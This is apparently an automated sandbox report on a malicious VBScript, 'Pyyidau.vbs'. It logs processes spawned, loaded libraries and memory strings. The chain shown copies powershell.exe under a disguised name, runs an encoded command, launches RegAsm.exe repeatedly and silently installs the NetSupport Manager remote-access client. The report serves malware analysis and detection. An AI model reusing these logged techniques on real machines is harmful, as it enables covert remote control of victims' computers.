                                Source: C:\Windows\Installer\MSI2BE4.tmpCommand line argument: /EC30_2_0049DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCommand line argument: PCD30_2_0049DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCommand line argument: NSM30_2_0049DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCommand line argument: system.ini30_2_0049DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCommand line argument: display.drv30_2_0049DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCommand line argument: boot30_2_0049DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCommand line argument: shellscr.drv30_2_0049DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCommand line argument: display.drv30_2_0049DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCommand line argument: module=%s30_2_0049DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCommand line argument: V14.1030_2_0049DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCommand line argument: ver=%s30_2_0049DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCommand line argument: winexec.ok30_2_0049DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCommand line argument: V15.1030_2_0049DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCommand line argument: V14.1030_2_0049DDD0
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCommand line argument: Client31_2_00E72031
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: module=%s32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: V14.1032_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: ver=%s32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: /ec32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: /EC32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: Hy!32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: PCD32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: NSM32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: nsmvxd.38632_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: nsmvxd.38632_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: nsmvga.drv32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: nsmvga.drv32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: system.ini32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: display.drv32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: boot32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: shellscr.drv32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: display.drv32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: module=%s32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: V14.1032_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: ver=%s32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: winexec.ok32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: V15.1032_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: V14.1032_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: PCIAX.DLL32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: Done:32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: winexec.ok32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: Restart32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: Exit32_2_001BDDD0
                                Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
                                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO MessageTable VALUES(%d, '%s', '%s', '%s', %d, %d, %d, '%s', '%s', %d, %I64u, %d, %d);
Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO ClientTable VALUES(%d, '%s', '%s', '%s', '%s', %d, %I64u);
Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS ClientTable(ClientID INT,ComputerName VARCHAR(100),IPAddress VARCHAR(40),MAC VARCHAR(12),Hostname VARCHAR(100),AppType INT,Time BIGINT);
Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO RecipientTable VALUES(%d, %d,%I64u, %d, '%s', '%s', %I64u);
Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO FileLinks VALUES('%s', '%s', '%s');
Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS MessageTable(MessageID INT,UniqueID VARCHAR(38),Text VARCHAR(256),Caption VARCHAR(80),Timeout INT,Flags INT,AppType INT,Operator VARCHAR(80),User VARCHAR(80),BroadcastFlags INT,Time BIGINT,RecipientCount INT,AcknowledgeCount INT);
Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO ParamTable VALUES('%s', '%s');
Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS ParamTable(Param VARCHAR(100), Value VARCHAR(100));
Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS FileLinks(LinkName VARCHAR(50),FileName VARCHAR(50),SubFolder VARCHAR(50));
Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE ParamTable SET Value = '%s' WHERE Param = '%s';
Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO ParamTable VALUES('%s', '%s');SELECT Value FROM ParamTable WHERE Param = '%s';UPDATE ParamTable SET Value = '%s' WHERE Param = '%s';CREATE TABLE IF NOT EXISTS FileLinks(LinkName VARCHAR(50),FileName VARCHAR(50),SubFolder VARCHAR(50));CREATE TABLE IF NOT EXISTS RecipientTable(MessageID INT,ClientID INT,ReceiveTime BIGINT,UserFlags INT,Username VARCHAR(80),Dept VARCHAR(80),AcknowledgeTime BIGINT);CREATE TABLE IF NOT EXISTS ScheduledMessageTable(MessageID INT,UniqueID VARCHAR(38),Text VARCHAR(256),Caption VARCHAR(80),Timeout INT,Flags INT,AppType INT,Operator VARCHAR(80),User VARCHAR(80),BroadcastFlags INT,Time BIGINT,SI_Timing INT,SI_StartDate VARCHAR(8),SI_EndDate VARCHAR(8),SI_Time VARCHAR(4),SI_WeekDays INT,SI_WeekParity INT,SI_Occurrence INT,SI_Day INT,SI_Month INT,SI_Year INT,SI_TimeZoneBias INT);CREATE TABLE IF NOT EXISTS MessageDepartments(UniqueID VARCHAR(50),Dept VARCHAR(80),Time BIGINT);CREATE TABLE IF NOT EXISTS MessageTable(MessageID INT,UniqueID VARCHAR(38),Text VARCHAR(256),Caption VARCHAR(80),Timeout INT,Flags INT,AppType INT,Operator VARCHAR(80),User VARCHAR(80),BroadcastFlags INT,Time BIGINT,RecipientCount INT,AcknowledgeCount INT);CREATE TABLE IF NOT EXISTS ClientTable(ClientID INT,ComputerName VARCHAR(100),IPAddress VARCHAR(40),MAC VARCHAR(12),Hostname VARCHAR(100),AppType INT,Time BIGINT);NextScheduledMessageIDNextMessageIDNextClientIDCREATE TABLE IF NOT EXISTS ParamTable(Param VARCHAR(100), Value VARCHAR(100));SQL error
Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT Value FROM ParamTable WHERE Param = '%s';
Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO ScheduledMessageTable VALUES(%d, '%s', '%s', '%s', %d, %d, %d, '%s', '%s', %d, %I64u, %d, '%s', '%s', '%s', %d, %d, %d, %d, %d, %d, %d);
Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS ScheduledMessageTable(MessageID INT,UniqueID VARCHAR(38),Text VARCHAR(256),Caption VARCHAR(80),Timeout INT,Flags INT,AppType INT,Operator VARCHAR(80),User VARCHAR(80),BroadcastFlags INT,Time BIGINT,SI_Timing INT,SI_StartDate VARCHAR(8),SI_EndDate VARCHAR(8),SI_Time VARCHAR(4),SI_WeekDays INT,SI_WeekParity INT,SI_Occurrence INT,SI_Day INT,SI_Month INT,SI_Year INT,SI_TimeZoneBias INT);
Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS ClientDupTable(id INT);
Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS MessageDupTable(id INT);
Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS RecipientTable(MessageID INT,ClientID INT,ReceiveTime BIGINT,UserFlags INT,Username VARCHAR(80),Dept VARCHAR(80),AcknowledgeTime BIGINT);
Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS MessageDepartments(UniqueID VARCHAR(50),Dept VARCHAR(80),Time BIGINT);
Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO MessageDepartments VALUES('%s', '%s', %I64u);
Source: Pyyidau.vbs ReversingLabs: Detection: 15%
Source: Pyyidau.vbs Virustotal: Detection: 25%
Source: C:\Users\user\Desktop\Pyyidau.vbs.exe File read: C:\Users\user\Desktop\Pyyidau.vbs
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs"
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Pyyidau.vbs.exe" /Y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\Desktop\Pyyidau.vbs.exe "C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc [Base64-encoded PowerShell command omitted]
Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs"
Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\vrep.msi" /quiet
Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 19326FA0C651FB2486638441C45D4A3A
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\attrib.exe ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic"
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\Installer\MSI264F.tmp "C:\Windows\Installer\MSI264F.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EU
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6881B33184DF9141E848EAD78A411E72 E Global\MSI0000
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\Installer\MSI2BE4.tmp "C:\Windows\Installer\MSI2BE4.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EU
Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe"
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\Installer\MSI3FCC.tmp "C:\Windows\Installer\MSI3FCC.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EV"NetSupport School" /EF".\Log Files" /EF".\Bookmarks" /EF".\Tests" /EF".\Store" /EF".\inv" /EF".\Resources" /EF".\Help" /EF".\Image" /EF".\Sound" /EF".\Video" /EA /EX /EC /Q /V /Q /I *
Source: C:\Windows\Installer\MSI3FCC.tmp Process created: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe winst64.exe /q /q /ex /i
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\Installer\MSI51C1.tmp "C:\Windows\Installer\MSI51C1.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EI
Source: unknown Process created: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" /* *
Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe" /Q "C:\Program Files (x86)\NetSupport\NetSupport Manager\Client32.ini"
Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe Process created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe"
Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe Process created: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" * /VistaUI
Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe Process created: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" * /VistaUI
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe Process created: C:\Windows\SysWOW64\cscript.exe "cscript.exe" C:\Windows\system32\Printing_Admin_Scripts\en-US\prnport.vbs -a -r NSM001 -h 127.0.0.1 -o raw -n 49850
Source: C:\Windows\SysWOW64\cscript.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4296 -ip 4296
Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe Process created: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" * /VistaUI
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv
Source: C:\Windows\SysWOW64\WerFault.exe Process created: unknown unknown
Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe Process created: unknown unknown
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: twext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cscui.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\wscript.exe Section loaded: workfoldersshell.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ntshrui.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: textshaping.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wtsapi32.dll
Source: C:\Windows\System32\wscript.exe Section loaded: shacct.dll
Source: C:\Windows\System32\wscript.exe Section loaded: idstore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: samlib.dll
Source: C:\Windows\System32\wscript.exe Section loaded: secur32.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wininet.dll
Source: C:\Windows\System32\wscript.exe Section loaded: starttiledata.dll
Source: C:\Windows\System32\wscript.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wlidprov.dll
Source: C:\Windows\System32\wscript.exe Section loaded: samcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: provsvc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: usermgrproxy.dll
Source: C:\Windows\System32\wscript.exe Section loaded: acppage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sfc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: aepic.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ntmarta.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: atl.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: mscoree.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: kernel.appcore.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: version.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: vcruntime140_clr0400.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: cryptsp.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: rsaenh.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: cryptbase.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: amsi.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: userenv.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: profapi.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: windows.storage.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: wldp.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: msasn1.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: msisip.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: wshext.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: appxsip.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: opcservices.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: gpapi.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: secur32.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: sspicli.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: uxtheme.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: propsys.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: edputil.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: urlmon.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: iertutil.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: srvcli.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: netutils.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: windows.staterepositoryps.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: policymanager.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: msvcp110_win.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: wintypes.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: appresolver.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: bcp47langs.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: slc.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: sppc.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: onecorecommonproxystub.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Section loaded: apphelp.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
